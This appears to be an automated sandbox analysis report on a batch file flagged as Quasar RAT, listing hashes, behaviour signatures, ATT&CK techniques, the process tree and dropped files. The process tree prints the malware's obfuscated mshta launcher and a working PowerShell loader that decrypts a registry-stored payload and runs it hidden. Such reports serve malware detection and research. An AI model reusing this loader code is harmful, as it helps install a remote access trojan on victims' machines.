Analysis

  • max time kernel
    138s
  • max time network
    139s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-05-2024 13:50

General

  • Target

    uni.bat

  • Size

    15.5MB

  • MD5

    180cabfef9e517bf8a30eaf917fb06ca

  • SHA1

    d47987045a7f1888b9a2a8c0159b5bd2c9d79274

  • SHA256

    fe831f43955da5cacbdf9eb8331cb62907141cb0f566b53e5a5f222fe30ee78c

  • SHA512

    91fed14301919d6a0514dd843e6ffaae07fc538199644f4c9033a3ef717a65974ba940ae6646fd4289c614138adbd385b3706169b1754cd8d5b9ef04891f91bb

  • SSDEEP

    49152:mcIdr0nn+8BsYSVa+P+J0XCCeRWpsKlP7k7o6SwofCLl7w+i2+SpQf86Gtpek1GI:1

Malware Config

Extracted

Family

quasar

Attributes
  • reconnect_delay

    3000

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 5 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 8 IoCs
  • Drops file in Windows directory 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 14 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 20 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
      PID:668
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
      1⤵
        PID:948
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
        1⤵
          PID:736
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
          1⤵
            PID:428
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:944
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:1132
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                1⤵
                  PID:1140
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                  1⤵
                    PID:1148
                    • C:\Windows\system32\taskhostw.exe
                      taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                      2⤵
                        PID:3104
                      • C:\Windows\$sxr-mshta.exe
                        C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-ehBGaRlEODKWQQdTfvks4312:VXzaBRST=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
                        2⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        • Modifies registry class
                        • Suspicious use of WriteProcessMemory
                        PID:1044
                        • C:\Windows\$sxr-cmd.exe
                          "C:\Windows\$sxr-cmd.exe" /c %$sxr-ehBGaRlEODKWQQdTfvks4312:VXzaBRST=%
                          3⤵
                          • Executes dropped EXE
                          • Suspicious use of WriteProcessMemory
                          PID:4524
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:IOwodPhXUR; "
                            4⤵
                              PID:2780
                            • C:\Windows\$sxr-powershell.exe
                              C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass
                              4⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious behavior: GetForegroundWindowSpam
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of SetWindowsHookEx
                              • Suspicious use of WriteProcessMemory
                              PID:1528
                              • C:\Windows\$sxr-cmd.exe
                                "C:\Windows\$sxr-cmd.exe" /C set "YpcwrqrZzb=[System.Diagnostics.Process]::GetProcessById(1528).WaitForExit();[System.Threading.Thread]::Sleep(5000); function bCipR($pdCcE){ $azyxY=[System.Security.Cryptography.Aes]::Create(); $azyxY.Mode=[System.Security.Cryptography.CipherMode]::CBC; $azyxY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $azyxY.Key=[System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))('Bn03cunjzaZMJkse/750PEbINesOLpXMJ3bFGmsT9f0='); $azyxY.IV=[System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))('iPrq3j/amXn4XerqJiVgBg=='); $tTxtH=$azyxY.('@C@r@e@a@t@e@D@e@c@r@y@p@t@o@r@'.Replace('@', ''))(); $jJfIY=$tTxtH.('@T@r@a@n@s@f@o@r@m@F@i@n@a@l@B@l@o@c@k@'.Replace('@', ''))($pdCcE, 0, $pdCcE.Length); $tTxtH.Dispose(); $azyxY.Dispose(); $jJfIY;}function dvTyf($pdCcE){ $uqlzn=New-Object System.IO.MemoryStream(,$pdCcE); $FEoEw=New-Object System.IO.MemoryStream; Invoke-Expression '$JpuBF @=@ @N@e@w@-@O@b@j@e@c@t@ @S@y@s@t@e@m@.@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@G@Z@i@p@S@t@r@e@a@m@(@$uqlzn,@ @[@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@C@o@m@p@r@e@s@s@i@o@n@M@o@d@e@]@:@:@D@e@c@o@m@p@r@e@s@s@)@;@'.Replace('@', ''); $JpuBF.CopyTo($FEoEw); $JpuBF.Dispose(); $uqlzn.Dispose(); $FEoEw.Dispose(); $FEoEw.ToArray();}function kWCWt($pdCcE){ $jJfIY = [System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))($pdCcE); $jJfIY = bCipR($jJfIY); $jJfIY = [System.Text.Encoding]::('@U@T@F@8@'.Replace('@', '')).('@G@e@t@S@t@r@i@n@g@'.Replace('@', ''))($jJfIY); return $jJfIY;}function execute_function($pdCcE,$YIILW){ $zOdZE = @( '$YCSSl = [System.@R@e@f@l@e@c@t@i@o@[email protected]]::@L@o@a@d@([byte[]]$pdCcE);'.Replace('@', ''), '$lsNPY = $YCSSl.EntryPoint;', '$lsNPY.Invoke($null, $YIILW);' ); foreach ($vSDVd in $zOdZE) { Invoke-Expression $vSDVd };}$KXrrS = kWCWt('jf2bvKDN5CoTgv5C072QvQ==');$ZZfQS = kWCWt('TMKlLadAhTHf+0yxOesGPhFDPPQghCW4KfrD05tKmpk=');$XFOhA = kWCWt('WUH2+BYck7a4wQjKSs9LRQ==');$REsor = kWCWt('Y8w7AU29S6DlwioFmC47tw==');if (@(get-process -ea silentlycontinue $REsor).count -gt 1) {exit};$HAnLi = [Microsoft.Win32.Registry]::('@L@o@c@a@l@M@a@c@h@i@n@e@'.Replace('@', '')).('@O@p@e@n@S@u@b@k@e@y@'.Replace('@', ''))($KXrrS).('@G@e@t@V@a@l@u@e@'.Replace('@', ''))($ZZfQS);$ecBcW=dvTyf (bCipR ([Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))($HAnLi)));execute_function $ecBcW (,[string[]] ($XFOhA));" & echo Invoke-Expression $env:YpcwrqrZzb; | C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass > nul
                                5⤵
                                • Executes dropped EXE
                                PID:4880
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:YpcwrqrZzb; "
                                  6⤵
                                    PID:1128
                                  • C:\Windows\$sxr-powershell.exe
                                    C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass
                                    6⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1272
                        • C:\Windows\System32\svchost.exe
                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                          1⤵
                          • Drops file in System32 directory
                          PID:1160
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                          1⤵
                            PID:1276
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                            1⤵
                              PID:1308
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                              1⤵
                                PID:1332
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                1⤵
                                  PID:1416
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                  1⤵
                                    PID:1432
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                    1⤵
                                      PID:1576
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                      1⤵
                                        PID:1588
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                        1⤵
                                          PID:1640
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                          1⤵
                                            PID:1716
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                            1⤵
                                              PID:1744
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                              1⤵
                                                PID:1780
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1832
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1892
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                    1⤵
                                                      PID:1900
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                      1⤵
                                                        PID:1964
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                        1⤵
                                                          PID:2000
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:1660
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                            1⤵
                                                              PID:2076
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                              1⤵
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2244
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                              1⤵
                                                                PID:2256
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                1⤵
                                                                  PID:2396
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                  1⤵
                                                                    PID:2404
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                    1⤵
                                                                    • Drops file in System32 directory
                                                                    PID:2492
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                    1⤵
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2572
                                                                  • C:\Windows\sysmon.exe
                                                                    C:\Windows\sysmon.exe
                                                                    1⤵
                                                                      PID:2592
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                      1⤵
                                                                        PID:2612
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                        1⤵
                                                                          PID:2624
                                                                        • C:\Windows\system32\wbem\unsecapp.exe
                                                                          C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                          1⤵
                                                                            PID:2980
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                            1⤵
                                                                              PID:1880
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                              1⤵
                                                                                PID:3180
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                1⤵
                                                                                  PID:3344
                                                                                • C:\Windows\Explorer.EXE
                                                                                  C:\Windows\Explorer.EXE
                                                                                  1⤵
                                                                                  • Enumerates connected drives
                                                                                  • Drops file in Windows directory
                                                                                  • Modifies Internet Explorer settings
                                                                                  • Modifies registry class
                                                                                  • Suspicious behavior: AddClipboardFormatListener
                                                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:3424
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\uni.bat"
                                                                                    2⤵
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:2540
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:jgzkrJoqAf; "
                                                                                      3⤵
                                                                                        PID:3964
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden
                                                                                        3⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Deletes itself
                                                                                        • Drops file in Windows directory
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:3356
                                                                                    • C:\Windows\system32\taskmgr.exe
                                                                                      "C:\Windows\system32\taskmgr.exe" /4
                                                                                      2⤵
                                                                                      • Checks SCSI registry key(s)
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious behavior: GetForegroundWindowSpam
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                      • Suspicious use of SendNotifyMessage
                                                                                      PID:2768
                                                                                    • C:\Windows\system32\NOTEPAD.EXE
                                                                                      "C:\Windows\system32\NOTEPAD.EXE" C:\Windows\New Text Document.txt
                                                                                      2⤵
                                                                                      • Drops file in Windows directory
                                                                                      PID:4832
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                    1⤵
                                                                                      PID:3552
                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                      1⤵
                                                                                        PID:3748
                                                                                      • C:\Windows\system32\SppExtComObj.exe
                                                                                        C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                        1⤵
                                                                                          PID:4536
                                                                                        • C:\Windows\System32\svchost.exe
                                                                                          C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                          1⤵
                                                                                            PID:4896
                                                                                          • C:\Windows\System32\svchost.exe
                                                                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                            1⤵
                                                                                              PID:1192
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                              1⤵
                                                                                                PID:2268
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                1⤵
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:4872
                                                                                              • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                1⤵
                                                                                                • Drops file in System32 directory
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:1728
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                1⤵
                                                                                                  PID:2652
                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                  1⤵
                                                                                                    PID:3660
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                    1⤵
                                                                                                      PID:1232
                                                                                                    • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                      C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                      1⤵
                                                                                                      • Checks BIOS information in registry
                                                                                                      • Enumerates system info in registry
                                                                                                      PID:2216
                                                                                                    • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                      C:\Windows\servicing\TrustedInstaller.exe
                                                                                                      1⤵
                                                                                                        PID:4908
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                        1⤵
                                                                                                          PID:628
                                                                                                        • C:\Windows\System32\mousocoreworker.exe
                                                                                                          C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                          1⤵
                                                                                                            PID:4972
                                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                                            C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                            1⤵
                                                                                                              PID:3388
                                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                                              C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                              1⤵
                                                                                                                PID:728
                                                                                                              • C:\Windows\System32\rundll32.exe
                                                                                                                C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                1⤵
                                                                                                                  PID:3508
                                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                  1⤵
                                                                                                                    PID:792

                                                                                                                  Network

                                                                                                                  MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                  Execution

                                                                                                                  Command and Scripting Interpreter

                                                                                                                  1
                                                                                                                  T1059

                                                                                                                  PowerShell

                                                                                                                  1
                                                                                                                  T1059.001

                                                                                                                  Defense Evasion

                                                                                                                  Modify Registry

                                                                                                                  1
                                                                                                                  T1112

                                                                                                                  Discovery

                                                                                                                  Query Registry

                                                                                                                  6
                                                                                                                  T1012

                                                                                                                  System Information Discovery

                                                                                                                  6
                                                                                                                  T1082

                                                                                                                  Peripheral Device Discovery

                                                                                                                  2
                                                                                                                  T1120

                                                                                                                  Replay Monitor

                                                                                                                  Loading Replay Monitor...

                                                                                                                  Downloads

                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                                    Filesize

                                                                                                                    53KB

                                                                                                                    MD5

                                                                                                                    a26df49623eff12a70a93f649776dab7

                                                                                                                    SHA1

                                                                                                                    efb53bd0df3ac34bd119adf8788127ad57e53803

                                                                                                                    SHA256

                                                                                                                    4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

                                                                                                                    SHA512

                                                                                                                    e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_djsr5mls.lix.ps1
                                                                                                                    Filesize

                                                                                                                    60B

                                                                                                                    MD5

                                                                                                                    d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                    SHA1

                                                                                                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                    SHA256

                                                                                                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                    SHA512

                                                                                                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                    MD5

                                                                                                                    2070b89a7cf7b4b6911493c67f2b5f2a

                                                                                                                    SHA1

                                                                                                                    0ba650fbe343498b074a38f9a18e2a818eee1b6c

                                                                                                                    SHA256

                                                                                                                    5beccb6f249a66fed2d2911e52b8aff27188511ae910daec48c487a108ced803

                                                                                                                    SHA512

                                                                                                                    496e29bcd78494bfef6e1321757dd5f75757294a1830378e162237723db058b72ef6b49c219965f8bbbdb2c4a6f90174c3c24edec9199a3423a9841cbf27b881

                                                                                                                  • C:\Windows\$sxr-cmd.exe
                                                                                                                    Filesize

                                                                                                                    283KB

                                                                                                                    MD5

                                                                                                                    8a2122e8162dbef04694b9c3e0b6cdee

                                                                                                                    SHA1

                                                                                                                    f1efb0fddc156e4c61c5f78a54700e4e7984d55d

                                                                                                                    SHA256

                                                                                                                    b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

                                                                                                                    SHA512

                                                                                                                    99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

                                                                                                                  • C:\Windows\$sxr-mshta.exe
                                                                                                                    Filesize

                                                                                                                    14KB

                                                                                                                    MD5

                                                                                                                    0b4340ed812dc82ce636c00fa5c9bef2

                                                                                                                    SHA1

                                                                                                                    51c97ebe601ef079b16bcd87af827b0be5283d96

                                                                                                                    SHA256

                                                                                                                    dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895

                                                                                                                    SHA512

                                                                                                                    d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045

                                                                                                                  • C:\Windows\$sxr-powershell.exe
                                                                                                                    Filesize

                                                                                                                    442KB

                                                                                                                    MD5

                                                                                                                    04029e121a0cfa5991749937dd22a1d9

                                                                                                                    SHA1

                                                                                                                    f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                                                                                                                    SHA256

                                                                                                                    9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                                                                                                                    SHA512

                                                                                                                    6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                                                                                                                  • C:\Windows\New Text Document.txt
                                                                                                                    Filesize

                                                                                                                    22B

                                                                                                                    MD5

                                                                                                                    4aeecc15787f9078557741d3d264305f

                                                                                                                    SHA1

                                                                                                                    a1635a19fdc7e30040052189cc7ef527980d4c85

                                                                                                                    SHA256

                                                                                                                    2af50915ce7c38778013321cf8c3d897e0a9974995f08c0ed828e18b84d4b531

                                                                                                                    SHA512

                                                                                                                    e27856eb394fad686d825245a32497a3fa979ea74862544b2118dc56ecac408dd8332769b03bb44e2b96b25da953657b43313f4ace1c2dc57e436a289e6618a7

                                                                                                                  • memory/668-116-0x00007FF864410000-0x00007FF864420000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/668-109-0x0000027BA5E80000-0x0000027BA5EA9000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    164KB

                                                                                                                  • memory/668-110-0x0000027BA5E80000-0x0000027BA5EA9000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    164KB

                                                                                                                  • memory/668-117-0x0000027BA5E80000-0x0000027BA5EA9000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    164KB

                                                                                                                  • memory/668-108-0x0000027BA5E50000-0x0000027BA5E73000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    140KB

                                                                                                                  • memory/668-118-0x0000027BA5E80000-0x0000027BA5EA9000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    164KB

                                                                                                                  • memory/736-141-0x000001CD73920000-0x000001CD73949000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    164KB

                                                                                                                  • memory/736-142-0x000001CD73920000-0x000001CD73949000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    164KB

                                                                                                                  • memory/736-134-0x000001CD73920000-0x000001CD73949000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    164KB

                                                                                                                  • memory/736-140-0x00007FF864410000-0x00007FF864420000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/948-128-0x00007FF864410000-0x00007FF864420000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/948-130-0x000002A7EC5A0000-0x000002A7EC5C9000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    164KB

                                                                                                                  • memory/948-122-0x000002A7EC5A0000-0x000002A7EC5C9000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    164KB

                                                                                                                  • memory/948-129-0x000002A7EC5A0000-0x000002A7EC5C9000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    164KB

                                                                                                                  • memory/1528-105-0x0000000180000000-0x0000000180007000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    28KB

                                                                                                                  • memory/1528-93-0x000001BA3D5C0000-0x000001BA3DB0E000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    5.3MB

                                                                                                                  • memory/1528-809-0x000001BA3EAF0000-0x000001BA3EB40000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    320KB

                                                                                                                  • memory/1528-812-0x000001BA3EC00000-0x000001BA3ECB2000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    712KB

                                                                                                                  • memory/1528-101-0x000001BA3E7B0000-0x000001BA3E7F2000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    264KB

                                                                                                                  • memory/1528-100-0x000001BA3E740000-0x000001BA3E7AA000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    424KB

                                                                                                                  • memory/1528-96-0x000001BA3E650000-0x000001BA3E702000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    712KB

                                                                                                                  • memory/1528-95-0x000001BA3E2C0000-0x000001BA3E64C000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    3.5MB

                                                                                                                  • memory/1528-94-0x000001BA3DB10000-0x000001BA3E2BE000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    7.7MB

                                                                                                                  • memory/1528-85-0x000001BA3C380000-0x000001BA3CA26000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    6.6MB

